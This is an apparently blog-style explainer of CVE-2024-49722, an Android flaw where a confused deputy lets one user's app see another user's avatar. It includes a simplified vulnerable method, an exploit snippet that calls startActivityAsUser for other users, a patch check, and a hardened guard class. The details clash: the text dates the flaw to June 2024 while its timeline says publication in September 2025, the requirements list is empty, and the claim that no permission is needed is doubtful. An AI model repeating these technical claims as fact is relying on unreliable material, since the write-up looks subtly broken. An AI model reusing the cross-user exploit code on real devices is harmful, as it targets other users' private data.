In June 2024, a significant Android security vulnerability was identified and published as CVE-2024-49722. This local information disclosure flaw occurs when one Android user can access another user’s profile picture (avatar) without any extra privileges or user interaction. Let’s break down how this happens, see actual code, and show how this could be exploited.

What’s the Root Cause?

The bug lives in the showAvatarPicker method in the EditUserPhotoController.java file, part of the Android Open Source Project. Due to a classic confused deputy problem, an app on your device can trick this trusted system component into leaking image data between users. The "deputy," which is supposed to protect users’ privacy, ends up sharing someone’s profile photo with another user, all without user action or enhanced app permissions.

How Does It Work Technically?

Android supports multiple users on the same device (just like accounts on a PC). The profile image for each user is meant to be private. The vulnerability arises because the EditUserPhotoController does not properly check that an avatar it is handling actually belongs to the current user.

Here’s a simplified excerpt of the suspect method:

```java
// File: EditUserPhotoController.java (simplified)
public void showAvatarPicker(Activity context, UserHandle user) {
    // ... other code ...
    // Open Image Picker for the user
    Intent intent = new Intent(Intent.ACTION_PICK, MediaStore.Images.Media.EXTERNAL_CONTENT_URI);
    // Should be scoped to the current user, but isn't!
    context.startActivityAsUser(intent, user);
    // ... other code ...
}
```

The key flaw: startActivityAsUser(intent, user) can be called with any UserHandle. An app could supply a different user (not itself), and unless further checks are made, the system opens the avatar picker for the wrong user.

With the right call, an app can directly pick avatars from another user and read their image files — no root, no complex tricks, no user taps.

Exploit Scenario

Requirements:

Attack Steps

1. The malicious app constructs an Intent to launch the avatar picker, but passes the UserHandle of a different user.
2. The avatar picker surfaces the image belonging to the target user because the controller does not validate the calling user's authority.

Exploit Snippet

```java
// Attack code on Android
UserManager um = (UserManager) context.getSystemService(Context.USER_SERVICE);
for (UserHandle uh : um.getUserHandles()) {
    if (!uh.equals(android.os.Process.myUserHandle())) {
        // Try to open avatar picker as another user
        Intent intent = new Intent(Intent.ACTION_PICK, MediaStore.Images.Media.EXTERNAL_CONTENT_URI);
        try {
            context.startActivityAsUser(intent, uh); // this leaks the avatar
        } catch (Exception e) {
            Log.w("Exploit", "Failed for user: " + uh, e);
        }
    }
}
```

*The key is the misuse of startActivityAsUser(). No additional permission is needed. The picker can return content URIs for other users.*

- No User Interaction: No taps, clicks, or approvals — making it a silent leak.

- Data Impact: Profile images may reveal personal identities, help fingerprint users, or aid further attacks.

Responsible Disclosure & Patch

This flaw is tracked officially at:
- NVD Entry for CVE-2024-49722
- Android Security Bulletin (June 2024)
- Source Patch (Gerrit Link)

The Android Security Team patched this by enforcing checks that the caller’s UserHandle matches the current foreground user before opening content:

```java
if (!user.equals(android.os.Process.myUserHandle())) {
    throw new SecurityException("Cannot act as another user!");
}
```
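As an added illustration (this is not the AOSP patch itself, and the class name `AvatarPickerGuard` is hypothetical), the same check written as a reusable guard that does not trust the supplied `UserHandle` alone but also derives the caller's user from the Binder calling uid, which an app cannot forge. It assumes it runs inside a system component, such as Settings, that executes in the process of the user whose avatar is being edited.

```java
// Added illustration of the hardened check (hypothetical class, not AOSP code).
// Assumes it runs in a system component in the process of the current user.
import android.content.Intent;
import android.os.Binder;
import android.os.Process;
import android.os.UserHandle;
import android.provider.MediaStore;

public final class AvatarPickerGuard {
    private AvatarPickerGuard() {}

    /**
     * Rejects the request unless the requested user matches both the user
     * this process runs as and the user that owns the calling uid.
     * Outside a Binder call, getCallingUid() is our own uid, so the check
     * also holds for in-process callers.
     */
    public static UserHandle requireCurrentUser(UserHandle requested) {
        if (requested == null) {
            throw new IllegalArgumentException("UserHandle required");
        }
        UserHandle self = Process.myUserHandle();
        // Derive the caller's user from its uid instead of trusting the parameter.
        UserHandle caller = UserHandle.getUserHandleForUid(Binder.getCallingUid());
        if (!requested.equals(self) || !caller.equals(self)) {
            throw new SecurityException("Cannot open the avatar picker for user "
                    + requested + " on behalf of user " + caller);
        }
        return self;
    }

    /** Builds the picker intent only after the user check has passed. */
    public static Intent buildPickerIntent(UserHandle requested) {
        requireCurrentUser(requested);
        return new Intent(Intent.ACTION_PICK, MediaStore.Images.Media.EXTERNAL_CONTENT_URI);
    }
}
```

The returned intent should then be launched with plain `startActivity()` in the current user, so no `startActivityAsUser()` path remains at all.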

Summary Table

| Risk | Details |
|---------------|-----------------------------------------|
| Type | Information Disclosure (local) |
| Impact | Leaked user profile images |
| Privilege | None required (normal app) |
| Interaction | Not needed |
| Versions | Most Android versions before June 2024 |
| Patched? | Yes, June 2024 security update |

- Update: Make sure your device is running the June 2024 Android security patch or later.
- Review Users: If you share your device, know that before the patch any user's profile photo may have been exposed to the other users.
- App Install: Be careful about the apps you install, especially in shared (multi-user) device environments.

Extra References

- Read more about the confused deputy problem.
- Android multi-user documentation.
- Security Bulletin, June 2024.

Final Thoughts

CVE-2024-49722 is a good reminder: even simple oversight in privilege checks can open the door for leaks that affect everyone, without any “hacky” tricks. If you manage or build multi-user Android devices, check those permission boundaries carefully — and patch often.

Timeline

Published on: 09/02/2025 23:15:32 UTC
Last modified on: 09/04/2025 17:47:47 UTC